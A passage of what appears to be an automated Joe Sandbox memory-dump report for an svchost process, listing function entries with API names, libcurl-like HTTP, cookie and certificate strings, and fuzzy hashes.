                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 25cf616ccf7261a61d47f31e848bec09644bc984af539448ebbd35d2c5120404
                                                                                                                                                                                • Instruction ID: 6f9aa31c0b1ba00ea5eaa7f101eb3889572edc6a8ca9aba69e40f1313ffb2de6
                                                                                                                                                                                • Opcode Fuzzy Hash: 25cf616ccf7261a61d47f31e848bec09644bc984af539448ebbd35d2c5120404
                                                                                                                                                                                • Instruction Fuzzy Hash: 5031D736609EC1E7E78C9F69EA941A9B3A4F788B91F480125CB6D43311CF3CE4B58708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freestrncmp
                                                                                                                                                                                • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$file$file://%s%s%s$https$xn--
                                                                                                                                                                                • API String ID: 1891267927-4130347283
                                                                                                                                                                                • Opcode ID: 612419aae2024713ba56702af049486eb8f476c97fe90e665fd4612d3358b1d4
                                                                                                                                                                                • Instruction ID: a04a96b9250d399cc9501e7f9c2068d478ae01d778c75ade7000cd06e4cb8b10
                                                                                                                                                                                • Opcode Fuzzy Hash: 612419aae2024713ba56702af049486eb8f476c97fe90e665fd4612d3358b1d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 83C150A2A0EF8299EA618B19A5403BA73E4FB487D4F4C4036CB8D43795DF3CE556C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$Sleep$select
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2442476585-0
                                                                                                                                                                                • Opcode ID: 99d95770c8e478787aa00b827e7b0742fa9a8913c8e3ab91204656ddf488e8a2
                                                                                                                                                                                • Instruction ID: 2c097eb037ada41408af8e8a99e85681bcdbcb366c7294b814d20bb84b9cd696
                                                                                                                                                                                • Opcode Fuzzy Hash: 99d95770c8e478787aa00b827e7b0742fa9a8913c8e3ab91204656ddf488e8a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CA1B122B0868386EB694F2D9C842BD2295FF4DBE4F184634DF2D666D4DF3D99428708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strchr
                                                                                                                                                                                • String ID: %zx$0$0$Malformatted trailing header, skipping trailer$http_chunk, added last chunk with trailers from client -> %d$http_chunk, added last, empty chunk$http_chunk, made chunk of %zu bytes -> %d$operation aborted by trailing headers callback
                                                                                                                                                                                • API String ID: 2830005266-126491959
                                                                                                                                                                                • Opcode ID: abe3ceb02854391a74cf306b8dc7cfb45ab71d0b1b1fc80b9ca78811a5754175
                                                                                                                                                                                • Instruction ID: 96b2fc6d2120eddbf9ac21b4fc3d5c16d66da6e733e205256f2554ca44225fb4
                                                                                                                                                                                • Opcode Fuzzy Hash: abe3ceb02854391a74cf306b8dc7cfb45ab71d0b1b1fc80b9ca78811a5754175
                                                                                                                                                                                • Instruction Fuzzy Hash: 0281C42270DA4691FB60DB29E4407BA63A0EB8D7D4F880032EB4D87696DF7CE547C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strcmp
                                                                                                                                                                                • String ID: %s%s$%s%s=%s$127.0.0.1$::1$Cookie$Cookie: $Restricted outgoing cookies due to header size, '%s' not sent$localhost
                                                                                                                                                                                • API String ID: 1004003707-1910649647
                                                                                                                                                                                • Opcode ID: 083054d2c91eb8073aff22576bd561d27307aaccb43013e4f22da1b56e178ea8
                                                                                                                                                                                • Instruction ID: 6dad3eb36bdffb8104cf2d2852c8e982c70cf922ba6c11aac905fdfa69dc2430
                                                                                                                                                                                • Opcode Fuzzy Hash: 083054d2c91eb8073aff22576bd561d27307aaccb43013e4f22da1b56e178ea8
                                                                                                                                                                                • Instruction Fuzzy Hash: A271F061B08B8682FA219B1AD5403BA2692EF4DBD4F4C0131DF5C4B796EF3CE9478348
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strncmp
                                                                                                                                                                                • String ID: /c/pgBuild64
                                                                                                                                                                                • API String ID: 1114863663-3326272364
                                                                                                                                                                                • Opcode ID: b3582383703839233d833c79e81ce75fbe5897da3e69bd41e2f3983c1c550846
                                                                                                                                                                                • Instruction ID: c1f072c459d620c94361b09e2b84a647935e49572aee28df87cb40c3a569ca1d
                                                                                                                                                                                • Opcode Fuzzy Hash: b3582383703839233d833c79e81ce75fbe5897da3e69bd41e2f3983c1c550846
                                                                                                                                                                                • Instruction Fuzzy Hash: BF21A27A71215E84ED119F17A9583A91396BB46FD9FC48166CE3807780EF39D49AC304
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=_vfwprintf_lfree
                                                                                                                                                                                • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 3487055449-995577734
                                                                                                                                                                                • Opcode ID: a35cef32800df147f9a8abf11264df95d74992b2864b29adc6112360db51eb03
                                                                                                                                                                                • Instruction ID: cf738e0ac540a40bd38958bcf91c1a690de949607dd1f357e17491d5b6aa918a
                                                                                                                                                                                • Opcode Fuzzy Hash: a35cef32800df147f9a8abf11264df95d74992b2864b29adc6112360db51eb03
                                                                                                                                                                                • Instruction Fuzzy Hash: E6512821B08787C1FB249A6DD4946FA2B91EB5C7C4F480035DF4E47686EF6CE44B8B48
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLasthtonssend
                                                                                                                                                                                • String ID: Sending data failed (%d)
                                                                                                                                                                                • API String ID: 2027122571-2319402659
                                                                                                                                                                                • Opcode ID: faae45e6a2c64d42992a6b346e04e0a913f6f05a79f5412f9d261b410abbe06e
                                                                                                                                                                                • Instruction ID: 162c88d585b1b16d14f891b17cca44447fbf2bb105ffb4f22ac617c781a2ee6c
                                                                                                                                                                                • Opcode Fuzzy Hash: faae45e6a2c64d42992a6b346e04e0a913f6f05a79f5412f9d261b410abbe06e
                                                                                                                                                                                • Instruction Fuzzy Hash: CD419232608E8684EB105FB9E414AAE3721EB59FD9F884532EB4A07794DF7CD14BC309
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 68290117
                                                                                                                                                                                  • Part of subcall function 68294A10: ___lc_codepage_func.MSVCRT ref: 68294A42
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___lc_codepage_funcstrlen
                                                                                                                                                                                • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                                                • API String ID: 962473550-2115465065
                                                                                                                                                                                • Opcode ID: 510814f8fe546983e93e9dcc38a1f95ea66455a78fca4571207376ec9573c394
                                                                                                                                                                                • Instruction ID: 0ab926ddb62d0b250be1d6b0493ac056b3dc13929d8b5f14602960803c593450
                                                                                                                                                                                • Opcode Fuzzy Hash: 510814f8fe546983e93e9dcc38a1f95ea66455a78fca4571207376ec9573c394
                                                                                                                                                                                • Instruction Fuzzy Hash: A531B17371464DC6DF558F2BE80476D77A1E781BA8F98C225DE688B748EB39C541CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno$ErrorLast$getpeername
                                                                                                                                                                                • String ID: accepted_set(sock=%qd, remote=%s port=%d)$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                                                                • API String ID: 2695284969-3669066118
                                                                                                                                                                                • Opcode ID: cec4949a37f2d47db90e11910a1886c6998b2bf9c8d73aa7da5d1436c396af45
                                                                                                                                                                                • Instruction ID: 94b35d2ee05a727e61a4bda40edc48ee3ef7f7e2d21854231b2961bb7eb3e585
                                                                                                                                                                                • Opcode Fuzzy Hash: cec4949a37f2d47db90e11910a1886c6998b2bf9c8d73aa7da5d1436c396af45
                                                                                                                                                                                • Instruction Fuzzy Hash: 15515122A18BC186E7608B19E9443EAB760FB997C4F485136DF8D07B56DF7CD186C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=_vfwprintf_lfree
                                                                                                                                                                                • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 3487055449-995577734
                                                                                                                                                                                • Opcode ID: ea9eea691be56e66bf40af05f32652f49f3170ecb48241195f41bc517e2725db
                                                                                                                                                                                • Instruction ID: 50cbb6e7f0cf17b878b0b5654b579bc5b89b6db30c85ac8220689a90d7a4e021
                                                                                                                                                                                • Opcode Fuzzy Hash: ea9eea691be56e66bf40af05f32652f49f3170ecb48241195f41bc517e2725db
                                                                                                                                                                                • Instruction Fuzzy Hash: 3541A261B0874782FA609B6DD8946FA6761BB4C7D8F480031DF0D57686EF6CE44B8708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=_vfwprintf_lfree
                                                                                                                                                                                • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 3487055449-995577734
                                                                                                                                                                                • Opcode ID: 6902d49e212d474938ada2b98bdf8c3a280f3904fc3ee545ffaf8e9740616d77
                                                                                                                                                                                • Instruction ID: c77f002f005811e3f6d01e06f40fbc66ab51982747c044ce8593c71627bc2732
                                                                                                                                                                                • Opcode Fuzzy Hash: 6902d49e212d474938ada2b98bdf8c3a280f3904fc3ee545ffaf8e9740616d77
                                                                                                                                                                                • Instruction Fuzzy Hash: E3418162B0878782FB109B6DD8946FA6761BB4C7D8F480031DF4C5769ADF7CE54A8708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=$free$_vfwprintf_l
                                                                                                                                                                                • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 4200051289-995577734
                                                                                                                                                                                • Opcode ID: b7d087695e4887ce5c3bcc372c30a92d56753bd70b4aa926898aa199a96ff8c4
                                                                                                                                                                                • Instruction ID: 6a94730f12e9a29400811bf058f7b456547d45c7afa24981feab4742ece2f4d0
                                                                                                                                                                                • Opcode Fuzzy Hash: b7d087695e4887ce5c3bcc372c30a92d56753bd70b4aa926898aa199a96ff8c4
                                                                                                                                                                                • Instruction Fuzzy Hash: C8416222B0878782FB109B6DD8945FA6761BB4C7D8F480031DF0D5765AEF6CE54A8748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=$free$_vfwprintf_l
                                                                                                                                                                                • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 4200051289-995577734
                                                                                                                                                                                • Opcode ID: 20329bc28d89859ef2ab0f3c0818a98b15c4459e3d096f9f2b14c1ee726ce534
                                                                                                                                                                                • Instruction ID: 762e003de59f951a57c2ba8839bb004cfedc373e7f1050d1307174fd87e1d95a
                                                                                                                                                                                • Opcode Fuzzy Hash: 20329bc28d89859ef2ab0f3c0818a98b15c4459e3d096f9f2b14c1ee726ce534
                                                                                                                                                                                • Instruction Fuzzy Hash: D8415F22B08747C2FA109B6DD8946BA6761BB4C7D8F480031DF0D5769AEF6CE54A8B08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=$free$_vfwprintf_l
